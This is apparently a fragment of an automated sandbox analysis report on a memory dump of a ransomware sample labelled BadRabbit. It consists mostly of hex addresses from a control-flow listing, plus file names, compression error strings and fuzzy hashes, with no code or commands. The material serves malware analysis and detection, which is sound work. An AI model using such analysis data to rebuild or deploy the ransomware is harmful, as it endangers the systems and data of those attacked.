                                                                                                                                                  0x000d2261
                                                                                                                                                  0x000d2263
                                                                                                                                                  0x000d2264
                                                                                                                                                  0x000d2268
                                                                                                                                                  0x000d226b
                                                                                                                                                  0x000d22b5
                                                                                                                                                  0x000d22b5
                                                                                                                                                  0x000d22b8
                                                                                                                                                  0x000d22b8
                                                                                                                                                  0x000d22b8
                                                                                                                                                  0x000d22bb
                                                                                                                                                  0x000d22bd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d22bf
                                                                                                                                                  0x000d22bf
                                                                                                                                                  0x000d22c2
                                                                                                                                                  0x000d22c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d22ca
                                                                                                                                                  0x000d22ce
                                                                                                                                                  0x000d22d8
                                                                                                                                                  0x000d22db
                                                                                                                                                  0x000d22dd
                                                                                                                                                  0x000d22e0
                                                                                                                                                  0x000d22e3
                                                                                                                                                  0x000d22e3
                                                                                                                                                  0x000d22e8
                                                                                                                                                  0x000d22e8
                                                                                                                                                  0x000d22ec
                                                                                                                                                  0x000d22f2
                                                                                                                                                  0x000d22f4
                                                                                                                                                  0x000d22f5
                                                                                                                                                  0x000d22f8
                                                                                                                                                  0x000d22f8
                                                                                                                                                  0x000d22fb
                                                                                                                                                  0x000d22fb
                                                                                                                                                  0x000d22ff
                                                                                                                                                  0x000d22ff
                                                                                                                                                  0x000d2301
                                                                                                                                                  0x000d2307
                                                                                                                                                  0x000d230d
                                                                                                                                                  0x000d2310
                                                                                                                                                  0x000d2313
                                                                                                                                                  0x000d2315
                                                                                                                                                  0x000d2351
                                                                                                                                                  0x000d2351
                                                                                                                                                  0x000d2358
                                                                                                                                                  0x000d235e
                                                                                                                                                  0x000d235e
                                                                                                                                                  0x000d2361
                                                                                                                                                  0x000d1dbf
                                                                                                                                                  0x000d1dbf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d1dbf
                                                                                                                                                  0x000d2367
                                                                                                                                                  0x000d2369
                                                                                                                                                  0x000d2370
                                                                                                                                                  0x000d237e
                                                                                                                                                  0x000d237e
                                                                                                                                                  0x000d2387
                                                                                                                                                  0x000d238a
                                                                                                                                                  0x000d2395
                                                                                                                                                  0x000d23a7
                                                                                                                                                  0x000d23ac
                                                                                                                                                  0x000d23af
                                                                                                                                                  0x000d23b2
                                                                                                                                                  0x000d23b4
                                                                                                                                                  0x000d23c2
                                                                                                                                                  0x000d23ca
                                                                                                                                                  0x000d23df
                                                                                                                                                  0x000d23eb
                                                                                                                                                  0x000d23f0
                                                                                                                                                  0x000d23f3
                                                                                                                                                  0x000d23f6
                                                                                                                                                  0x000d23f8
                                                                                                                                                  0x000d2406
                                                                                                                                                  0x000d2406
                                                                                                                                                  0x000d240a
                                                                                                                                                  0x000d240d
                                                                                                                                                  0x000d2413
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2419
                                                                                                                                                  0x000d2419
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2419
                                                                                                                                                  0x000d23fa
                                                                                                                                                  0x000d23fa
                                                                                                                                                  0x000d2164
                                                                                                                                                  0x000d2164
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2164
                                                                                                                                                  0x000d23b6
                                                                                                                                                  0x000d23b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d23b6
                                                                                                                                                  0x000d2372
                                                                                                                                                  0x000d2372
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2372
                                                                                                                                                  0x000d2317
                                                                                                                                                  0x000d2317
                                                                                                                                                  0x000d231a
                                                                                                                                                  0x000d231c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d231e
                                                                                                                                                  0x000d231e
                                                                                                                                                  0x000d2321
                                                                                                                                                  0x000d2321
                                                                                                                                                  0x000d2324
                                                                                                                                                  0x000d2329
                                                                                                                                                  0x000d232c
                                                                                                                                                  0x000d232c
                                                                                                                                                  0x000d232c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2321
                                                                                                                                                  0x000d226d
                                                                                                                                                  0x000d226d
                                                                                                                                                  0x000d2270
                                                                                                                                                  0x000d2270
                                                                                                                                                  0x000d2270
                                                                                                                                                  0x000d2273
                                                                                                                                                  0x000d2275
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2277
                                                                                                                                                  0x000d2277
                                                                                                                                                  0x000d227a
                                                                                                                                                  0x000d227c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2282
                                                                                                                                                  0x000d2286
                                                                                                                                                  0x000d2290
                                                                                                                                                  0x000d2293
                                                                                                                                                  0x000d2295
                                                                                                                                                  0x000d2298
                                                                                                                                                  0x000d229b
                                                                                                                                                  0x000d229b
                                                                                                                                                  0x000d22a0
                                                                                                                                                  0x000d22a0
                                                                                                                                                  0x000d22a4
                                                                                                                                                  0x000d22aa
                                                                                                                                                  0x000d22ac
                                                                                                                                                  0x000d22ad
                                                                                                                                                  0x000d22b0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d22b0
                                                                                                                                                  0x000d21ef
                                                                                                                                                  0x000d21f7
                                                                                                                                                  0x000d21fa
                                                                                                                                                  0x000d21fd
                                                                                                                                                  0x000d21ff
                                                                                                                                                  0x000d2228
                                                                                                                                                  0x000d222b
                                                                                                                                                  0x000d222e
                                                                                                                                                  0x000d2231
                                                                                                                                                  0x000d2233
                                                                                                                                                  0x000d2235
                                                                                                                                                  0x000d2238
                                                                                                                                                  0x000d223b
                                                                                                                                                  0x000d223d
                                                                                                                                                  0x000d2345
                                                                                                                                                  0x000d2345
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2345
                                                                                                                                                  0x000d2243
                                                                                                                                                  0x000d224d
                                                                                                                                                  0x000d2250
                                                                                                                                                  0x000d2253
                                                                                                                                                  0x000d2256
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2201
                                                                                                                                                  0x000d2201
                                                                                                                                                  0x000d2201
                                                                                                                                                  0x000d2204
                                                                                                                                                  0x000d2206
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d220c
                                                                                                                                                  0x000d220d
                                                                                                                                                  0x000d2218
                                                                                                                                                  0x000d221a
                                                                                                                                                  0x000d221d
                                                                                                                                                  0x000d2220
                                                                                                                                                  0x000d2223
                                                                                                                                                  0x000d2226
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2226
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2201
                                                                                                                                                  0x000d21cf
                                                                                                                                                  0x000d21d2
                                                                                                                                                  0x000d21d8
                                                                                                                                                  0x000d21da
                                                                                                                                                  0x000d21dd
                                                                                                                                                  0x000d21e0
                                                                                                                                                  0x000d21e5
                                                                                                                                                  0x000d21e5
                                                                                                                                                  0x000d2343
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d241c
                                                                                                                                                  0x000d241c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2422
                                                                                                                                                  0x000d2422
                                                                                                                                                  0x000d2425
                                                                                                                                                  0x000d248e
                                                                                                                                                  0x000d2494
                                                                                                                                                  0x000d249b
                                                                                                                                                  0x000d24a9
                                                                                                                                                  0x000d24ea
                                                                                                                                                  0x000d24ea
                                                                                                                                                  0x000d24f2
                                                                                                                                                  0x000d24f4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d24ae
                                                                                                                                                  0x000d24ae
                                                                                                                                                  0x000d24b1
                                                                                                                                                  0x000d24b3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d24b9
                                                                                                                                                  0x000d24bd
                                                                                                                                                  0x000d24c0
                                                                                                                                                  0x000d24c2
                                                                                                                                                  0x000d24c5
                                                                                                                                                  0x000d24d2
                                                                                                                                                  0x000d24d8
                                                                                                                                                  0x000d24e1
                                                                                                                                                  0x000d24e4
                                                                                                                                                  0x000d24e7
                                                                                                                                                  0x000d24e7
                                                                                                                                                  0x000d24f6
                                                                                                                                                  0x000d24f6
                                                                                                                                                  0x000d24f8
                                                                                                                                                  0x000d25b2
                                                                                                                                                  0x000d25b7
                                                                                                                                                  0x000d25ba
                                                                                                                                                  0x000d25c0
                                                                                                                                                  0x000d25c2
                                                                                                                                                  0x000d25c9
                                                                                                                                                  0x000d25cc
                                                                                                                                                  0x000d25cf
                                                                                                                                                  0x000d25d2
                                                                                                                                                  0x000d25d4
                                                                                                                                                  0x000d25e1
                                                                                                                                                  0x000d25e1
                                                                                                                                                  0x000d25e3
                                                                                                                                                  0x000d25f7
                                                                                                                                                  0x000d25f7
                                                                                                                                                  0x000d25fa
                                                                                                                                                  0x000d25fc
                                                                                                                                                  0x000d260a
                                                                                                                                                  0x000d260d
                                                                                                                                                  0x000d260d
                                                                                                                                                  0x000d2610
                                                                                                                                                  0x000d2616
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2616
                                                                                                                                                  0x000d25fe
                                                                                                                                                  0x000d25fe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d25fe
                                                                                                                                                  0x000d25e5
                                                                                                                                                  0x000d25e5
                                                                                                                                                  0x000d25ec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d25ec
                                                                                                                                                  0x000d25d6
                                                                                                                                                  0x000d25d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d25d6
                                                                                                                                                  0x000d24fe
                                                                                                                                                  0x000d24fe
                                                                                                                                                  0x000d2500
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2506
                                                                                                                                                  0x000d250e
                                                                                                                                                  0x000d2511
                                                                                                                                                  0x000d2520
                                                                                                                                                  0x000d252d
                                                                                                                                                  0x000d2532
                                                                                                                                                  0x000d253e
                                                                                                                                                  0x000d2543
                                                                                                                                                  0x000d2545
                                                                                                                                                  0x000d259f
                                                                                                                                                  0x000d259f
                                                                                                                                                  0x000d25a2
                                                                                                                                                  0x000d25a8
                                                                                                                                                  0x000d25aa
                                                                                                                                                  0x000d25aa
                                                                                                                                                  0x000d25ac
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2547
                                                                                                                                                  0x000d2547
                                                                                                                                                  0x000d2547
                                                                                                                                                  0x000d254a
                                                                                                                                                  0x000d254c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2552
                                                                                                                                                  0x000d2555
                                                                                                                                                  0x000d255b
                                                                                                                                                  0x000d255e
                                                                                                                                                  0x000d2561
                                                                                                                                                  0x000d2569
                                                                                                                                                  0x000d2571
                                                                                                                                                  0x000d258b
                                                                                                                                                  0x000d2598
                                                                                                                                                  0x000d259b
                                                                                                                                                  0x000d259d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d259d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2547
                                                                                                                                                  0x000d2427
                                                                                                                                                  0x000d2427
                                                                                                                                                  0x000d242a
                                                                                                                                                  0x000d242f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2431
                                                                                                                                                  0x000d2434
                                                                                                                                                  0x000d2437
                                                                                                                                                  0x000d243a
                                                                                                                                                  0x000d243d
                                                                                                                                                  0x000d2443
                                                                                                                                                  0x000d2445
                                                                                                                                                  0x000d2448
                                                                                                                                                  0x000d2449
                                                                                                                                                  0x000d244c
                                                                                                                                                  0x000d244f
                                                                                                                                                  0x000d2454
                                                                                                                                                  0x000d245a
                                                                                                                                                  0x000d245d
                                                                                                                                                  0x000d2461
                                                                                                                                                  0x000d2468
                                                                                                                                                  0x000d246b
                                                                                                                                                  0x000d2470
                                                                                                                                                  0x000d2473
                                                                                                                                                  0x000d2476
                                                                                                                                                  0x000d2479
                                                                                                                                                  0x000d247c
                                                                                                                                                  0x000d2482
                                                                                                                                                  0x000d2482
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2619
                                                                                                                                                  0x000d2619
                                                                                                                                                  0x000d261c
                                                                                                                                                  0x000d261e
                                                                                                                                                  0x000d266d
                                                                                                                                                  0x000d2670
                                                                                                                                                  0x000d2676
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2676
                                                                                                                                                  0x000d2620
                                                                                                                                                  0x000d2620
                                                                                                                                                  0x000d2622
                                                                                                                                                  0x000d2650
                                                                                                                                                  0x000d2652
                                                                                                                                                  0x000d2655
                                                                                                                                                  0x000d265a
                                                                                                                                                  0x000d265d
                                                                                                                                                  0x000d265f
                                                                                                                                                  0x000d2661
                                                                                                                                                  0x000d2664
                                                                                                                                                  0x000d2664
                                                                                                                                                  0x000d2664
                                                                                                                                                  0x000d266a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d266a
                                                                                                                                                  0x000d2624
                                                                                                                                                  0x000d2624
                                                                                                                                                  0x000d2627
                                                                                                                                                  0x000d2627
                                                                                                                                                  0x000d2627
                                                                                                                                                  0x000d2629
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d262f
                                                                                                                                                  0x000d2633
                                                                                                                                                  0x000d2638
                                                                                                                                                  0x000d263a
                                                                                                                                                  0x000d263d
                                                                                                                                                  0x000d2640
                                                                                                                                                  0x000d2645
                                                                                                                                                  0x000d2646
                                                                                                                                                  0x000d2649
                                                                                                                                                  0x000d264c
                                                                                                                                                  0x000d264e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d264e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d267c
                                                                                                                                                  0x000d2681
                                                                                                                                                  0x000d2688
                                                                                                                                                  0x000d268d
                                                                                                                                                  0x000d2698
                                                                                                                                                  0x000d269a
                                                                                                                                                  0x000d26e4
                                                                                                                                                  0x000d26e4
                                                                                                                                                  0x000d26e6
                                                                                                                                                  0x000d2795
                                                                                                                                                  0x000d2795
                                                                                                                                                  0x000d279d
                                                                                                                                                  0x000d27a0
                                                                                                                                                  0x000d27a6
                                                                                                                                                  0x000d27a8
                                                                                                                                                  0x000d27aa
                                                                                                                                                  0x000d27ad
                                                                                                                                                  0x000d27b0
                                                                                                                                                  0x000d27b2
                                                                                                                                                  0x000d27c0
                                                                                                                                                  0x000d27c2
                                                                                                                                                  0x000d27ce
                                                                                                                                                  0x000d27ce
                                                                                                                                                  0x000d27d1
                                                                                                                                                  0x000d27d4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d27d4
                                                                                                                                                  0x000d27b4
                                                                                                                                                  0x000d27b4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d27b4
                                                                                                                                                  0x000d26ec
                                                                                                                                                  0x000d26f4
                                                                                                                                                  0x000d26f7
                                                                                                                                                  0x000d2706
                                                                                                                                                  0x000d2713
                                                                                                                                                  0x000d2718
                                                                                                                                                  0x000d2724
                                                                                                                                                  0x000d2729
                                                                                                                                                  0x000d272b
                                                                                                                                                  0x000d2785
                                                                                                                                                  0x000d2785
                                                                                                                                                  0x000d278b
                                                                                                                                                  0x000d278d
                                                                                                                                                  0x000d278f
                                                                                                                                                  0x000d278f
                                                                                                                                                  0x000d278f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d272d
                                                                                                                                                  0x000d272d
                                                                                                                                                  0x000d272d
                                                                                                                                                  0x000d2730
                                                                                                                                                  0x000d2732
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2738
                                                                                                                                                  0x000d273b
                                                                                                                                                  0x000d2741
                                                                                                                                                  0x000d2744
                                                                                                                                                  0x000d2747
                                                                                                                                                  0x000d274f
                                                                                                                                                  0x000d2757
                                                                                                                                                  0x000d2771
                                                                                                                                                  0x000d277e
                                                                                                                                                  0x000d2781
                                                                                                                                                  0x000d2783
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2783
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d272d
                                                                                                                                                  0x000d269c
                                                                                                                                                  0x000d269c
                                                                                                                                                  0x000d269f
                                                                                                                                                  0x000d269f
                                                                                                                                                  0x000d269f
                                                                                                                                                  0x000d26a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d26a7
                                                                                                                                                  0x000d26aa
                                                                                                                                                  0x000d26ac
                                                                                                                                                  0x000d26ad
                                                                                                                                                  0x000d26b0
                                                                                                                                                  0x000d26b3
                                                                                                                                                  0x000d26c0
                                                                                                                                                  0x000d26c6
                                                                                                                                                  0x000d26d2
                                                                                                                                                  0x000d26d7
                                                                                                                                                  0x000d26e0
                                                                                                                                                  0x000d26e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d26e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d27d7
                                                                                                                                                  0x000d27d7
                                                                                                                                                  0x000d27da
                                                                                                                                                  0x000d27dc
                                                                                                                                                  0x000d282c
                                                                                                                                                  0x000d282c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d282c
                                                                                                                                                  0x000d27de
                                                                                                                                                  0x000d27de
                                                                                                                                                  0x000d27e0
                                                                                                                                                  0x000d2811
                                                                                                                                                  0x000d2813
                                                                                                                                                  0x000d2816
                                                                                                                                                  0x000d281c
                                                                                                                                                  0x000d281e
                                                                                                                                                  0x000d2820
                                                                                                                                                  0x000d2823
                                                                                                                                                  0x000d2823
                                                                                                                                                  0x000d2823
                                                                                                                                                  0x000d2829
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2829
                                                                                                                                                  0x000d27e2
                                                                                                                                                  0x000d27e2
                                                                                                                                                  0x000d27e5
                                                                                                                                                  0x000d27e5
                                                                                                                                                  0x000d27e5
                                                                                                                                                  0x000d27e8
                                                                                                                                                  0x000d27ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d27f0
                                                                                                                                                  0x000d27f4
                                                                                                                                                  0x000d27f9
                                                                                                                                                  0x000d27fb
                                                                                                                                                  0x000d27fe
                                                                                                                                                  0x000d2801
                                                                                                                                                  0x000d2806
                                                                                                                                                  0x000d2807
                                                                                                                                                  0x000d280a
                                                                                                                                                  0x000d280d
                                                                                                                                                  0x000d280f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d280f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2832
                                                                                                                                                  0x000d2832
                                                                                                                                                  0x000d2835
                                                                                                                                                  0x000d2837
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d283d
                                                                                                                                                  0x000d2840
                                                                                                                                                  0x000d2842
                                                                                                                                                  0x000d2845
                                                                                                                                                  0x000d2847
                                                                                                                                                  0x000d2888
                                                                                                                                                  0x000d288b
                                                                                                                                                  0x000d288b
                                                                                                                                                  0x000d288d
                                                                                                                                                  0x000d2890
                                                                                                                                                  0x000d2893
                                                                                                                                                  0x000d2893
                                                                                                                                                  0x000d2895
                                                                                                                                                  0x000d2895
                                                                                                                                                  0x000d2898
                                                                                                                                                  0x000d289a
                                                                                                                                                  0x000d28a1
                                                                                                                                                  0x000d28a7
                                                                                                                                                  0x000d28aa
                                                                                                                                                  0x000d28ad
                                                                                                                                                  0x000d28ad
                                                                                                                                                  0x000d28af
                                                                                                                                                  0x000d28af
                                                                                                                                                  0x000d28b2
                                                                                                                                                  0x000d28b4
                                                                                                                                                  0x000d28b5
                                                                                                                                                  0x000d28b5
                                                                                                                                                  0x000d28b5
                                                                                                                                                  0x000d28b8
                                                                                                                                                  0x000d28bb
                                                                                                                                                  0x000d28be
                                                                                                                                                  0x000d28c1
                                                                                                                                                  0x000d28c4
                                                                                                                                                  0x000d28ca
                                                                                                                                                  0x000d28ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28c4
                                                                                                                                                  0x000d2849
                                                                                                                                                  0x000d2849
                                                                                                                                                  0x000d284b
                                                                                                                                                  0x000d284e
                                                                                                                                                  0x000d2865
                                                                                                                                                  0x000d2865
                                                                                                                                                  0x000d2868
                                                                                                                                                  0x000d286b
                                                                                                                                                  0x000d2879
                                                                                                                                                  0x000d2879
                                                                                                                                                  0x000d286d
                                                                                                                                                  0x000d286d
                                                                                                                                                  0x000d2873
                                                                                                                                                  0x000d2873
                                                                                                                                                  0x000d287c
                                                                                                                                                  0x000d287f
                                                                                                                                                  0x000d2882
                                                                                                                                                  0x000d2884
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2886
                                                                                                                                                  0x000d2886
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2886
                                                                                                                                                  0x000d2884
                                                                                                                                                  0x000d2850
                                                                                                                                                  0x000d2850
                                                                                                                                                  0x000d2857
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2859
                                                                                                                                                  0x000d2859
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28d5
                                                                                                                                                  0x000d28d5
                                                                                                                                                  0x000d28d9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28df
                                                                                                                                                  0x000d28df
                                                                                                                                                  0x000d28e2
                                                                                                                                                  0x000d28e5
                                                                                                                                                  0x000d28e8
                                                                                                                                                  0x000d28eb
                                                                                                                                                  0x000d28ed
                                                                                                                                                  0x000d28f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d28fb
                                                                                                                                                  0x000d28fb
                                                                                                                                                  0x000d28ff
                                                                                                                                                  0x000d2900
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d29c8
                                                                                                                                                  0x000d29c8
                                                                                                                                                  0x000d29ca
                                                                                                                                                  0x000d29cd
                                                                                                                                                  0x000d2a3e
                                                                                                                                                  0x000d2a3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a3e
                                                                                                                                                  0x000d29cf
                                                                                                                                                  0x000d29cf
                                                                                                                                                  0x000d29d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d29d4
                                                                                                                                                  0x000d29d4
                                                                                                                                                  0x000d29d7
                                                                                                                                                  0x000d2a07
                                                                                                                                                  0x000d2a07
                                                                                                                                                  0x000d2a0a
                                                                                                                                                  0x000d2a39
                                                                                                                                                  0x000d2a39
                                                                                                                                                  0x000d2a3c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a3c
                                                                                                                                                  0x000d2a0c
                                                                                                                                                  0x000d2a0c
                                                                                                                                                  0x000d1899
                                                                                                                                                  0x000d1899
                                                                                                                                                  0x000d1dc2
                                                                                                                                                  0x000d1dc2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d1dc2
                                                                                                                                                  0x000d29d9
                                                                                                                                                  0x000d29d9
                                                                                                                                                  0x000d29dc
                                                                                                                                                  0x000d29dc
                                                                                                                                                  0x000d29dc
                                                                                                                                                  0x000d29de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d29e0
                                                                                                                                                  0x000d29e0
                                                                                                                                                  0x000d29e4
                                                                                                                                                  0x000d29e7
                                                                                                                                                  0x000d29e9
                                                                                                                                                  0x000d29eb
                                                                                                                                                  0x000d29ee
                                                                                                                                                  0x000d29f1
                                                                                                                                                  0x000d29f3
                                                                                                                                                  0x000d29f6
                                                                                                                                                  0x000d29f7
                                                                                                                                                  0x000d29fa
                                                                                                                                                  0x000d29fd
                                                                                                                                                  0x000d2a00
                                                                                                                                                  0x000d2a03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a05
                                                                                                                                                  0x000d2a05
                                                                                                                                                  0x000d2a05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a44
                                                                                                                                                  0x000d2a44
                                                                                                                                                  0x000d2a46
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2a49
                                                                                                                                                  0x000d2a49
                                                                                                                                                  0x000d2a4b
                                                                                                                                                  0x000d2a4c
                                                                                                                                                  0x000d2a4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d17be
                                                                                                                                                  0x000d1dd0
                                                                                                                                                  0x000d1dd0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d1dd0
                                                                                                                                                  0x000d208b
                                                                                                                                                  0x000d208f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2091
                                                                                                                                                  0x000d2091
                                                                                                                                                  0x000d2097
                                                                                                                                                  0x000d2098
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d2098

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid literal/length code$too many length or distance symbols$|J$|J
                                                                                                                                                  • API String ID: 0-1185913139
                                                                                                                                                  • Opcode ID: 040e1c5af4b4d9819b14b9769c06c0a795e5eece3207e60eca3e76683dc1bfab
                                                                                                                                                  • Instruction ID: d9bcec9f4680a3bd190eccf278a7da1a28d5c6fdcda45f9c4507ed5a3f35660a
                                                                                                                                                  • Opcode Fuzzy Hash: 040e1c5af4b4d9819b14b9769c06c0a795e5eece3207e60eca3e76683dc1bfab
                                                                                                                                                  • Instruction Fuzzy Hash: A5626C71E00615DFCF68CF59C8906ADBBF2FF98301B1481AAD856AB349D7349A41DFA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
